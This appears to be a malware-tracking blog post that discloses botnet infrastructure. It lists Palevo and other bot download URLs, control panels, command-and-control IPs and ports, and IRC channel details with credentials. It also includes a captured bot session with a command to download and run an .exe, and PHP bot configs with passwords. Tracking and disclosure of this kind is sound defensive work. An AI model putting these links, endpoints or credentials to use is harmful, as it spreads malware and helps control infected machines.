Category: Uncategorized

HTTP malware spreading through networks know as palevo worm exe files: http://fa715921.urlbeat.net http://b7b0380e.goneviral.com config file: http://04ed4837.tubeviral.com Bot panel used to control zombies: Download panel: http://cec3f665.ultrafiles.net http://8b47fd59.tinylinks.co virustotal scan: 4 /43 (9.3%) http://www.virustotal.com/file-scan/report.html?id=31cf7e82afe834189765aadb4d3b057c8a5bdbafd0236ac3717945de644ea134-1319067167

The guy behind this large net is hf user and he’s very l33t hecker here his monster net now open for public visits lol 8 leafs with probably 15k bots inside every leaf i estimate it around 100k bots server: 109.68.191.156 TCP port 1888 server: 109.68.191.159 TCP port 1888 server: 31.214.201.175 TCP port 1888 Server:Read more...

Real heckers and very hard to know from where lamers belong(look at domain name) ng.albanianetwork.com 89.248.168.87 api.wipmania.com api.wipmania.com 199.15.234.7 gn.albacrew.com 89.248.168.87 Download URLs http://199.15.234.7/ (api.wipmania.com) Outgoing connection to remote server: ng.albanianetwork.com TCP port 6869 Outgoing connection to remote server: api.wipmania.com TCP port 80 Outgoing connection to remote server: ng.albanianetwork.com TCP port 9731 Outgoing connection toRead more...

Panel picture: Panel url: http://22079a17.urlbeat.net exe file used to infect: http://d5243fd7.filesonthe.net hosting infos: http://whois.domaintools.com/69.162.107.11

safetysamvps.info 199.119.201.232 Server: 199.119.201.232:6667 Server Password: Username: Catalyst21 Nickname: n{DEU|XP-32}214249 Channel: #Catalyst (Password: ) Channeltopic: Now talking in #catalyst Topic On: [ #catalyst ] [ IRC ] Topic By: [ Execute ] hosting infos: http://whois.domaintools.com/199.119.201.232

api.trafficnum.net 184.106.152.29 Server: 184.106.152.29:2345 Server Password: Username: x Nickname: n[DEU|XP]7983462 Channel: #!prbla! (Password: ) Channeltopic: :.m /125/125/85/84/52/33/11/110/108/114/59/118/70/112/100/115/112/96/55/69/127/100/42/54/28/33/17/63/48/51/ Topic By: [ spin ] hosting infos: http://whois.domaintools.com/184.106.152.29

Remote Host Port Number 199.15.234.7 80 50.17.217.128 80 83.233.33.6 80 88.13.254.233 4242 PASS secret PRIVMSG ##n :[DNS]: Blocked 1310 domain(s) – Redirected 0 domain(s) NICK n{US|XPa}egiruwp USER egiruwp 0 0 :egiruwp PONG :ED4B405C JOIN ##n secret PRIVMSG ##n :[d=”http://dl.dropbox.com/u/40789812/Comet1185501.exe” s=”279040 bytes”] Updated bot file “C:Documents and SettingsUserNameApplication DataScxaxs.exe” – Download retries: 0 hosting infos: http://whois.domaintools.com/88.13.254.233

Panel here: http://92.241.130.174/vn/ http://92.241.130.174/vn/bot/ this malware is being for sell in hecking boards screen of panel here: hosting infos: http://whois.domaintools.com/92.241.130.174

This http botnet is very big one FAKE ANTIVIRUS wich infect machines connect to http to reports infections or download files control panel here: http://www.duffiduffid.ru/stat/ http://www.duffiduffid.ru/stat/stat3.php Resolved : [duffiduffid.ru] To [82.210.157.9] Resolved : [duffiduffid.ru] To [113.161.87.176] Resolved : [duffiduffid.ru] To [71.217.16.11] Resolved : [duffiduffid.ru] To [60.19.30.135] Resolved : [duffiduffid.ru] To [87.126.200.246] hosting infos: http://whois.domaintools.com/87.126.200.246

var $config = array(“server”=>”69.162.81.123”, “port”=>2221, “pass”=>”lol1”, “prefix”=>”[NkD]-“, “maxrand”=>8, “chan”=>”#nkd”, “key”=>””, “modes”=>”+iB-x”, “password”=>”123”, “trigger”=>”.”, “hostauth”=>”*” var $config = array(“server”=>”69.162.81.123”, “port”=>2222, “pass”=>”mgn22”, “prefix”=>”BOTN3T|”, “maxrand”=>8, “chan”=>”#magno”, “key”=>””, “modes”=>”+iB-x”, “password”=>”soufoda”, “trigger”=>”.”, “hostauth”=>”*” hosting infos: http://whois.domaintools.com/69.162.81.123